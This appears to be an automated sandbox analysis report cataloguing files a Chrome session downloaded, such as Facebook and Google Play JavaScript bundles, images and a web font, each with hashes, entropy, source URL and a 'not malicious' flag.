                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("compareDOMOrder",[],(function(a,b,c,d,e,f){"use strict";function a(a,b){return a.compareDocumentPosition(b)&Node.DOCUMENT_POSITION_FOLLOWING?-1:1}f["default"]=a}),66);.__d("createLayoutContext",["compareDOMOrder","emptyFunction","react","useRefEffect","useUnsafeRef_DEPRECATED"],(function(a,b,c,d,e,f,g){"use strict";var h,i,j=i||(i=d("react"));b=i;var k=b.useContext,l=b.useImperativeHandle,m=b.useMemo,n=b.useReducer;function a(a){var b={getLayout:function(){return a},dispatch:c("emptyFunction"),nodes:new Map(),values:[]},d=j.createContext(b);function e(a){var b=a.children,c=a.imperativeRef,e=a.value;a=q();var f=a[0],g=a[1],h=a[2];l(c,function(){return{forceUpdate:function(){return h()}}},[h]);a=m(function(){return{getLayout:e,dispatch:h,nodes:f,values:g}},[h,f,e,g]);return j.jsx(d.Provider,{value:a,children:b})}e.displayName=e.name+" [from "+f.id+"]";function g(a){return j.jsx(d.Provider,babelHelpers["extends"]({value:b},a))}g.displayName=g.name+" [from "+f.id+"]
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (6735)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):28815
                                                                                                                                                                                                                                Entropy (8bit):5.582969537394197
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:RDfALR2Eq9iqM9iO8YMri4HJQ6deqtl4E7gqzIoTvvaiQYKhc3wSW0Dm6/mXXKO3:RDcCJQ6dBfYregv0D/+KOx1
                                                                                                                                                                                                                                MD5:B9B91A44A89E975AD8A814EA863AF491
                                                                                                                                                                                                                                SHA1:F56DC8A28B471EA8F0153333DD13634FB3C382F5
                                                                                                                                                                                                                                SHA-256:B734E9ACF9AB9F17CB40B8916CB03C7544FC7915951E9D9724024AD69AAA27ED
                                                                                                                                                                                                                                SHA-512:46943E2F2EE1A6F9823C52976BEDF2E4401161AA41ACF377A2B13A0818F003CCF6C54F7946C6051A7912A767C195DEF516F071B43685A1AC3F755A0B64B67394
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/ye/r/BCReGA2whNu.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("BanzaiAdapter",["cr:5866"],(function(a,b,c,d,e,f,g){g["default"]=b("cr:5866")}),98);.__d("BanzaiConsts",[],(function(a,b,c,d,e,f){a={SEND:"Banzai:SEND",OK:"Banzai:OK",ERROR:"Banzai:ERROR",SHUTDOWN:"Banzai:SHUTDOWN",BASIC:"basic",VITAL:"vital",BASIC_WAIT:6e4,BASIC_WAIT_COMET:2e3,VITAL_WAIT:1e3,BATCH_SIZE_LIMIT:64e3,EXPIRY:864e5,BATCH_TIMEOUT:1e4,LAST_STORAGE_FLUSH:"banzai:last_storage_flush",STORAGE_FLUSH_INTERVAL:12*60*6e4,POST_READY:0,POST_INFLIGHT:1,POST_SENT:2};b=a;f["default"]=b}),66);.__d("BanzaiUtils",["BanzaiConsts","FBLogger","cr:1172","cr:9985","cr:9986"],(function(a,b,c,d,e,f){"use strict";var g,h={canSend:function(a){return a[2]>=b("cr:9985")()-(g||(g=b("BanzaiConsts"))).EXPIRY},filterPost:function(a,c,d,e){if(e.overlimit)return!0;if(!e.sendMinimumOnePost&&a[4]+e.currentSize>(g||(g=b("BanzaiConsts"))).BATCH_SIZE_LIMIT)return!0;var f=a.__meta;if(f.status!=null&&f.status>=(g||(g=b("BanzaiConsts"))).POST_SENT||!h.canSend(a))return!1;if(f.status!=null&&f.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3260)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):10762
                                                                                                                                                                                                                                Entropy (8bit):5.379732879924647
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:w5/cOvikJSBxiFoFBgUpLJOH/+p/q0BK62dpYxqxO41GHtH8o1GiKSW8fpIHZ:A/cUxR3UBJOh9tOnNHHFROZ
                                                                                                                                                                                                                                MD5:6B937B2E35342EA3AA6B42163A1D0E80
                                                                                                                                                                                                                                SHA1:EC2DFA3F6FE73EEA1856EC8110F7CFA31BBE5BB4
                                                                                                                                                                                                                                SHA-256:413A46CE279B3DFCBFF61C1AF7BE32656675E47336B6301701F701902EBF53B8
                                                                                                                                                                                                                                SHA-512:B458B6CFB298EE079FDDBE9011E6A422BB79EE0DEB545422D9EBFA3D752FBDB0C355874D710B6F4DC73EE78776C166107760C189854ED7CAE2605529E5C113D9
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/y8/r/fCWCnWQldVh.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("Button",["csx","cx","invariant","CSS","DOM","DataStore","Event","Parent","emptyFunction","isNode"],(function(a,b,c,d,e,f,g,h,i,j){var k="uiButtonDisabled",l="uiButtonDepressed",m="_42fr",n="_42fs",o="button:blocker",p="href",q="ajaxify";function r(a,b){var e=d("DataStore").get(a,o);b?e&&(e.remove(),d("DataStore").remove(a,o)):e||d("DataStore").set(a,o,c("Event").listen(a,"click",c("emptyFunction").thatReturnsFalse,c("Event").Priority.URGENT))}function s(a){a=d("Parent").byClass(a,"uiButton")||d("Parent").bySelector(a,"._42ft");if(!a)throw new Error("invalid use case");return a}function t(a){return c("DOM").isNodeOfType(a,"a")}function u(a){return c("DOM").isNodeOfType(a,"button")}function v(a){return d("CSS").matchesSelector(a,"._42ft")}var w={getInputElement:function(a){a=s(a);if(t(a))throw new Error("invalid use case");if(u(a)){a instanceof HTMLButtonElement||j(0,21261);return a}return c("DOM").find(a,"input")},isEnabled:function(a){return!(d("CSS").hasClass(s
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (10953)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):151566
                                                                                                                                                                                                                                Entropy (8bit):5.39929251490803
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:JKzpzSVqQwMTqHD+yOGJLlViLRbrnCefvgYeMhroycP:JezSsfLlieP
                                                                                                                                                                                                                                MD5:BC987911D4BED722BE159E8E4A955EE4
                                                                                                                                                                                                                                SHA1:0637F70A3D1C00CDCDA780B9ACC21EA998E75AC7
                                                                                                                                                                                                                                SHA-256:C31B9CE3C5C30304DD4F59649186764B75FED6F28059104C605A4F8FDC5CC2B5
                                                                                                                                                                                                                                SHA-512:F7440F9E947479402466655BE6C26B11E0A39CE331B958EAE9BB65051ABEAC56407AA40EE29AF9B54F4725DECD8E82FCD1CB627D94641307446A541279CFABEA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("AdsBrowserExtensionErrorUtils",["isFalsey"],(function(a,b,c,d,e,f,g){"use strict";var h="chrome-extension://";function a(a){a=a.split(h);a=a[a.length-1];return a.split("/")[0]}function b(a){return!c("isFalsey")(a)&&a.indexOf(h)>-1}g.CHROME_EXTENSION=h;g.extractExtensionID=a;g.isBrowserExtensionError=b}),98);.__d("LaminarDebugger",["EventEmitter"],(function(a,b,c,d,e,f,g){"use strict";var h="DEBUGGER";a=function(){function a(){this.$1=[],this.$6={},this.$3=100,this.$2=new Array(this.$3),this.$4=new(c("EventEmitter"))(),this.$5=!1}var b=a.prototype;b.getDebuggerActionDispatchQueue=function(){return this.$2};b.addSnapshotToDebuggerActionDispatchQueue=function(a){this.$6=a.newState,this.$4.emit(h,a),this.$2.push(a),this.$2.shift()};b.updateCaptureRate=function(a){a>0&&(this.$2.length+=a-this.$3,this.$3=a)};b.addDebugListener=function(a){return this.$4.addListener(h,a)};b.removeAllDebugListeners=function(){this.$4.removeAllListeners(h)};b.getPauseActionDispatches=fun
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 720x352, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):46200
                                                                                                                                                                                                                                Entropy (8bit):7.9955704705259585
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:768:9BueLEuAAOchHt+Zlfl+DfOIC95tpWT06ISQffs0nEEsjvaGFZIfes+rdUX6qcGD:PueJAahHt+ZlAjOXVYlyEEYvzZ5dUXlh
                                                                                                                                                                                                                                MD5:912E5E91C9202A2D5433564D1D9091C4
                                                                                                                                                                                                                                SHA1:DFA408003ECD5E844841D6E92E80B040E9139F6F
                                                                                                                                                                                                                                SHA-256:84CAFC0A14060976134E63A4F407E482D5473BB429187F00DBE56258D304A9A0
                                                                                                                                                                                                                                SHA-512:792A2CBD0A48765C1A43540BF2097098BA001B5A1DA054ABDA797DDED0BBD57365CB08787099699471738566F55983921E7F73A582EAB83CA7914B469C2C9437
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:RIFFp...WEBPVP8 d........*..`.>U$.E#.!%)4....cm....P{c...e.q>v.-+..W.w....%.~?.........K...y....._...?....../V_.....{......S.......=....<........g.....{...............~.......................g.......x........c...;....7.z.2.....5.7.7O..........._a.....O........S...........o...?...?z....~...lh..h..F....L.I.......X]:N.....R..81"W1/.4...!.......-..b...c.Yqp.2........!D.,=.b.po.;..."....7..1_.P..+"T.....v#e.'...r..qN..P.....?..f...P..}B]ZX....Gz....&......0.M...*4&LK#~.{.H\.r~....R-..*:.....Qpm8..;..;.]..^......).v...d.S.......`.r`..%..IM#W.....n..........=l%..$&..Tr.!.B3L.&J3..sM.%m.o.e.?f...Yt.b.3Aw;........=...%.%...9.,.d..@.&*.khV.&...9.cO^.,...d.B...k..XGb........97.......p<.^.H..ZB..a....ou...w.......Ma......aD.......R......$A'g../la..7Db...\F.s...-..$..:.B.jQ....}..L.....8^.N`.C ..i..k..N.....S...Y.F..4.u..I_...d3.k..WT....0.......+]:%..AVZ.f.U.[...\|\`....-...%..<.O...U..{}2.a........Xg.....Uu........'.t...^xg.x.B]...~..........:.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 200 x 200, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):6016
                                                                                                                                                                                                                                Entropy (8bit):7.931230609029136
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:VKPMNbu1/GzZgw2MUe5N4iL+IdSHgwg/CPD5TreJ7xlVmhx1a2sKdNJVwJ49fDfx:APMQ1/k3h5F+1uCP1c73Ve7aEnwa5DWw
                                                                                                                                                                                                                                MD5:2EDBD2236163FCACA2E6ADD4655EB2D8
                                                                                                                                                                                                                                SHA1:785170958CE759A39179424E02914DCF04511957
                                                                                                                                                                                                                                SHA-256:6253D1FE8F45FC5B01DCCA1DB4854CD8BB819389A848978791AC1D3FF98102EE
                                                                                                                                                                                                                                SHA-512:3E5DE01D3B3E0E6F44FD006085CBA1863291CE52D1C9C07088EA1B15CAF273B47C96E11F7101428F87F2AA1116AF73D31F9E87F1F6E05CB3E24839AC37703E54
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:.PNG........IHDR..............X......sRGB........:IDATx..].UU..wDD.DD..ADoA..D/EO.....C/}.C.IA..EPY.AE...d..=....6j..**~.u.8*......(......(t.q.z....?.^...r.....k........t....*.7JdV..l.d.....H.K..xd&<..z.MzJ7$CW......O....?..s.o..V.....'...6.A.4..]j....2I.w...h...lR\...?S....^...=.....' (IC.J......j....g..2..H...s..) (Nu.3.Jd~...SLr...qg..-Pz.f.h..i.2)}....XEER.k....=.....M. ...)...f.._.T4...h...A..$I.z..s...3....Y...[..6.sws.......p=x.y.........||....A.6...}...*.......T.."&x..W....W...C>U.x..Q.\...Pm........{L*}P.f..h..u(y.8K.,...."zB.....-.v$..!@3Bh".B.P.../..8..YM<..|......8y..5...y.:...JF.R}.."./gP4 ..#..x..S.>d..Ks......W~..qNN..`.AS..{..n\.m.)...&...S@./.=2..JUd...|-......@.@Q..g)......T.!C}...4.d....i.24...U>.....y....".+G....k...h9..G.x.J.......Of.pU]..]^......I...5dm2g..(Bf....k....-.c.H.....d..&.d.GH...g.~.*..Ri.. .._..".#]q}p.v..)>L..A..R.<I...>..#....=.......3I.k.....0.H..W.....3....*..U?..sA.MWy..-9?X .2...._....n.A.....S8....ZJ&...J.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (706)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):9181
                                                                                                                                                                                                                                Entropy (8bit):5.4852034502040885
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:AF5goLTDknN2Sur1sWEI/Jw+Oo+EIgOgKUUElA4ayhL/dM7PUK8xIOG:AF5bLTDknN2SuryHI/Jw+Oo+ELOgKvEg
                                                                                                                                                                                                                                MD5:19114D72B8411A78A0C1BFF574A892A4
                                                                                                                                                                                                                                SHA1:3E79EB7C0B5350E2C549163AE802CDEB3FE5DDE2
                                                                                                                                                                                                                                SHA-256:9BE1D9E313B8AEA8AD5DDBB7047DB370EA5582A2FAD9B5F32502C96D1E4B42FE
                                                                                                                                                                                                                                SHA-512:42583F367F6BBA6C349322A06243B1F2C6A9842B80AC398B8E4699A5924C94EE325C92D44C07C6FCD15369634EFB2E2D71231EF9BA28398E2907A4B4A04DBABC
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:"https://www.gstatic.com/_/boq-play/_/js/k=boq-play.PlayStoreUi.ru.rIMe_465lJE.2021.O/ck=boq-play.PlayStoreUi.Y1yArtXW1Kk.L.B1.O/am=R7cZwOj6QDAJDPAPHgdjAQ/d=1/exm=LEikZe,_b,_tp,byfTOb,lsjVmc/excm=_b,_tp,searchview/ed=1/wt=2/ujg=1/rs=AB1caFXJl0m234JZdkIlc9Y8a_1vUWHvZw/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;Hs0fpd:jLUKge;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;Rdd4dc:WXw8B;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAu0tf:z5Gxfe;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;sgjhQc:bQAegc;wR5FRb:O1Gjze;xqZiqf:BBI74;yEQyxe:TLjaTd;yxTchf:KUM7Z;zxnPse:GkRiKb/m=Wt6vjf,hhhU8,FCpbqb,WhJNk"
                                                                                                                                                                                                                                Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{.var YK;_.XK=function(a){this.H=a||{cookie:""}};_.l=_.XK.prototype;._.l.set=function(a,b,c){let d;var e=!1;let f;if(typeof c==="object"){f=c.cia;e=c.A5||!1;d=c.domain||void 0;var g=c.path||void 0;var h=c.oN}if(/[;=\s]/.test(a))throw Error("Jc`"+a);if(/[;\r\n]/.test(b))throw Error("Kc`"+b);h===void 0&&(h=-1);c=d?";domain="+d:"";g=g?";path="+g:"";e=e?";secure":"";h=h<0?"":h==0?";expires="+(new Date(1970,1,1)).toUTCString():";expires="+(new Date(Date.now()+h*1E3)).toUTCString();this.H.cookie=a+"="+b+c+g+h+e+(f!=null?";samesite="+f:"")};._.l.get=function(a,b){const c=a+"=",d=(this.H.cookie||"").split(";");for(let e=0,f;e<d.length;e++){f=d[e].trim();if(f.lastIndexOf(c,0)==0)return f.slice(c.length);if(f==a)return""}return b};_.l.remove=function(a,b,c){const d=this.get(a)!==void 0;this.set(a,"",{oN:0,path:b,domain:c});return d};_.l.tn=function(){return YK(this).keys};_.l.Ci=function(){return
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 211 x 200, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):5200
                                                                                                                                                                                                                                Entropy (8bit):7.9274026492660745
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:rmf2rbOyPJ9hYAZBwj7T0vNwTdXcavRFbmI870JyBd8cHxm3irUovLQ+PqXF:rM2HOw9hRZu8v+THKvDHHxm3tojbyV
                                                                                                                                                                                                                                MD5:71D6B687C90A54B1B86E17D906BA33CD
                                                                                                                                                                                                                                SHA1:5DAB0FD4A2C06A7D49125C0954486A4321939605
                                                                                                                                                                                                                                SHA-256:7308556C17835FEE3648F14C2B0E23026F81946842889B4586BEFCB5910E19A0
                                                                                                                                                                                                                                SHA-512:0A925171EF387F880FD33995350873E9C7992FED89CC1688C9E4C2618B049B7C68CCEFB6F8E56490AC7C8C71D43665CF462E0AB9E8F779492C6D93F12C01785D
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:.PNG........IHDR.............r......sRGB.........IDATx...p\.u...7.u_.IH....2..i.2y.$$...:.&$....@.dRh...dx......J..W,..d...l.,Y.w..%Y...V..J..z...q.Xw.>.{....g..-y......s......f..."$......I.Hz..Vw.*...^,...k.8.$.u.8..........N....@X...5....^%m...@..P.zC.{..cg.]....@d.o.c...S....G.CA..F......(.V.-.h.K....LXkfl....._.5.m..x.#.&...vk..\g.)..1..........Sf.c..sZI.8.....`.{.............E.L.."O!........~l....E.....L.@....".k..O...`..{..............bI{.g.|..;.t.5.....K`.h.K..r?9L..Y.X......i.{...v|/.7......=.. .E....b.7.Ax.O..j.....=..0%#.&...H......nY.......\..["...+x.W#...P....h.No.X{...)x.Gl...K.am3_....[.V..3x.ug8g..%.!]h.......E.ph..2..{.c.<x.~.phn%m!.F.6O....v..'].KQ&/...>8..K......*..t.2@......H.I7....~v.=.... .W..`%..A ..!ZE..Ic.......S.".Mt...GuW.R0.......SA....Yo..L.1z....)..d....UVu4.bI....}.I...S.gG.1V..gT=.(.OPt....tbI....l....x.>>d&<.c...t.M./..gXZZ.~ml|....\.....d.N..t.i.s.F........=.y..9....Y.....t6j....rHU..#H.!.3.,C t.Rl.....P..l..i.!.gU...
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 24 x 24, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):1315
                                                                                                                                                                                                                                Entropy (8bit):6.699572044474413
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:L5Y6JIZ663SuWh8I+pCLmPQnTbBeX/7vetxw9LIQnJkKk0c:LEZ6mSuU89tPQT9y7R9TJk7
                                                                                                                                                                                                                                MD5:AC1E1C4D6F16359701B059ED4E8246B4
                                                                                                                                                                                                                                SHA1:FF19B30A3B3D8D1765C239B25DBC98CB3263786A
                                                                                                                                                                                                                                SHA-256:45444D590A67D30E8B2FDE01BB6482F829383B64BF14A4B19B86E22FDC319FBB
                                                                                                                                                                                                                                SHA-512:97E16A8A20E00FA17BEB11A5C77768F9FA42E1BD6B797DEB1FAB0A5B477C036A29E1785AA92947264F2E5972C05887969948F43FF4E69D4320A9BEB4B1664831
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/yH/r/xgVgalBG80z.png
                                                                                                                                                                                                                                Preview:.PNG........IHDR...................aPLTEGpL...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................E.B.....tRNS..5.Pp.H../.)..hL.M.>a1.3..' -......g@......Z.Yi.....\Q.I.WueU..;.[..?...wyn..}.7z:.=....s..d,.+*".%.....K.A2.C..E.m..kD.ql..Gov.J..t........O#....4]_.B6.Sc...9..R8{...`....<....~............^sx.m....IDAT(.c`....N/q...[y.d...=.Ds...|jF.................X`....}3.g..$....U .arN...x..T....(d+V.7.......kq.N.'g........~...M..9.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:Web Open Font Format, TrueType, length 6956, version 1.0
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):6956
                                                                                                                                                                                                                                Entropy (8bit):7.9301019807594955
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:f1e/kvt6gM3QbPUKG6JPhlVrql6qKrPIaM4SUQ6rrLk6aa9qf4zZ260qv6Qo7HvF:deEo7dyVhlIDerrLZ9tzqqpoLN
                                                                                                                                                                                                                                MD5:CE6FF493B5FCDD0A6B6545A6A51A9DB6
                                                                                                                                                                                                                                SHA1:D1D22FBAAF1C286D4008CD63BC3CCA0B14E38EFB
                                                                                                                                                                                                                                SHA-256:58253AE21FD05D80B422BF5538140E1E6B3D96D8D35DDAB958519FBFE25E302F
                                                                                                                                                                                                                                SHA-512:B6AA2A36E512B4E79306546CBF93C5B9807F1413EFC62AC826AAAFCBAEA8D439BD1F2374397A900ADA1C5672FCD8E9EBEC61FDE7A2B969315ABDD677DEB20E7E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://apps.apple.com/assets/webexp-iconfont/fonts/webexpicons_text-ce6ff493b5fcdd0a6b6545a6a51a9db6.woff
                                                                                                                                                                                                                                Preview:wOFF.......,......).........................GSUB.......3...B....OS/2...<...C...VG.P.cmap...........ri..glyf.......+.....>head.......3...6 r..hhea....... ...$./..hmtx.............#..loca...8...L...LlVs.maxp........... .O..name.......:...v..P.post.......J...5.<..x.c`d``.b.c.a`tq..a.``a....cNfz"P.....i. f.....#.O.x.c`dY.8...........a+.f.c.g.......XA@.k...[......=`(a.....f.......C.x...YN.Q....Q..ypdr 1...].......Z..C.ex..t_....G@=<..T?T....._.}.o...mN.QSK3m...A....y]V......u-2..OM...V|wJ.3..K.>....3a.K....n.c.%+.....u..-w.|..m..7..lWE6.".W..":BE......9..Zt.z..S._4.h..-:G##3.FfL....132cnd......+#3.Ff.[L.z..5.h1u..b...b...b&..gy3.,.F.......\9_....x..Y....u...{f..9v...cwfvf.....E+V'..!...I...G..E....eWbs..0....#....G*.6.W.6...E q.........]$.H..3.........{.{...C.w.>..|..9..2Od..K.........(..|.....5.....!...g)....38NFB..mc..jz(.D.n?zar*......T<..F.X<iXtfhL...J%..p...Or.p3.\/K<.s.A..Q.K....I..m....n.[..~....z...!.{A=....n?.dj@%...+.........L....hD.._........2..
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (45939)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):97853
                                                                                                                                                                                                                                Entropy (8bit):4.6409695169080525
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:cR9pqLYmuEi/bA+TnJDpamoObnmodwbwnwmwowd6/yW8RNK+blic1rU6fJGnjkuN:6piVuEi/bA+TnJDpamoObnmodwbwnwmF
                                                                                                                                                                                                                                MD5:56922B59D92E23C35526DA118D91489B
                                                                                                                                                                                                                                SHA1:ED7E5AD4B9BA3A030DD1EF89DD1F8ACC263A3A1A
                                                                                                                                                                                                                                SHA-256:D6CD81C2A7964E01179F4311942C61B0ED49032C3C9112FB74EF5684A2B3F282
                                                                                                                                                                                                                                SHA-512:A408CC2D4FE5DC52529B11A88C9EDFC678A4E1CF634CF54F76A3739C7C8E555E726DAC3FEF362DF43A2871A46BA764F7DC29F477071CD6183617F4AC86C6D3EB
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("CometLinkNewImpl.react",["BaseLink.react","CometDangerouslySuppressInteractiveElementsContext","CometLinkUtils.react","FDSTextContext","gkx","isCometRouterUrl","react","react-strict-dom"],(function(a,b,c,d,e,f,g){"use strict";var h,i=h||(h=d("react")),j=h.useContext,k={disabled:{color:"x1dntmbh",textDecorationLine:"x1ubmc1d xkrqix3",$$css:!0},root:{color:"x1heor9g",textDecorationLine:"x1sur9pj xkrqix3",$$css:!0}},l={block:{display:"x1lliihq",$$css:!0},"inline-block":{display:"x1rg5ohu",$$css:!0}};b=i.forwardRef(a);function a(a,b){var e=a.color_DEPRECATED,f=a.disabled;f=f===void 0?!1:f;var g=a.display_DEPRECATED;g=g===void 0?"inline":g;var h=a.href,m=a.role,n=a.target,o=a.weight_DEPRECATED,p=a.xstyle_DEPRECATED;a=babelHelpers.objectWithoutPropertiesLoose(a,["color_DEPRECATED","disabled","display_DEPRECATED","href","role","target","weight_DEPRECATED","xstyle_DEPRECATED"]);var q=d("FDSTextContext").useFDSTextContext(),r=j(c("CometDangerouslySuppressInteractiveEleme
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3861)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):31218
                                                                                                                                                                                                                                Entropy (8bit):5.324429260638175
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:so/MPtWU9Ywx3UpxbY/Y3YOgQxnYeYZYHYZYVY+Y2mSSivJjne2vh1eA+HZzqmPl:RIT7hsZwuvLN54WAclQq2
                                                                                                                                                                                                                                MD5:E5448D39933BC347B40C9F54492F32A1
                                                                                                                                                                                                                                SHA1:DB96BDCCF87D3E1EDFB898604D7A0F5C40D0B430
                                                                                                                                                                                                                                SHA-256:C41ECBD066B65704841824817C3F5EB24077B8D2CFB2DF5C2550D45467C4A299
                                                                                                                                                                                                                                SHA-512:E6724DB597500FFE1DAF103837D93D63102A94CD318076670E7D0A958766B0152CEDB5900EF21587DD36C3ACC9F6FBA6BF80A2CA1F866CC811E6C34DBD0B3058
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://connect.facebook.net/signals/config/221433308641448?v=2.9.169&r=stable&domain=www.facebook.com&hme=d82868061a8c707cd31395a3055e7449daa03bd520872727258c39e6af34523e&ex_m=70%2C120%2C106%2C110%2C61%2C4%2C99%2C69%2C16%2C96%2C88%2C51%2C54%2C171%2C174%2C186%2C182%2C183%2C185%2C29%2C100%2C53%2C77%2C184%2C166%2C169%2C179%2C180%2C187%2C130%2C41%2C34%2C142%2C15%2C50%2C193%2C192%2C132%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C92%2C17%2C14%2C95%2C91%2C90%2C107%2C52%2C109%2C39%2C108%2C30%2C93%2C26%2C167%2C170%2C139%2C28%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C101%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C103%2C102%2C104%2C97%2C10%2C20%2C3%2C38%2C74%2C19%2C85%2C56%2C83%2C33%2C73%2C0%2C94%2C32%2C82%2C87%2C47%2C46%2C86%2C37%2C5%2C89%2C81%2C44%2C35%2C84%2C2%2C36%2C63%2C42%2C105%2C45%2C79%2C68%2C111%2C60%2C59%2C31%2C98%2C58%2C55%2C49%2C78%2C72%2C24%2C112%2C199%2C198%2C200%2C205%2C206%2C207%2C203%2C195%2C131%2C133%2C162%2C194%2C196%2C121%2C156%2C144%2C150%2C188%2C189%2C128%2C231%2C115%2C125%2C126%2C232%2C164%2C118%2C234%2C165%2C135%2C122%2C153%2C147%2C113%2C127
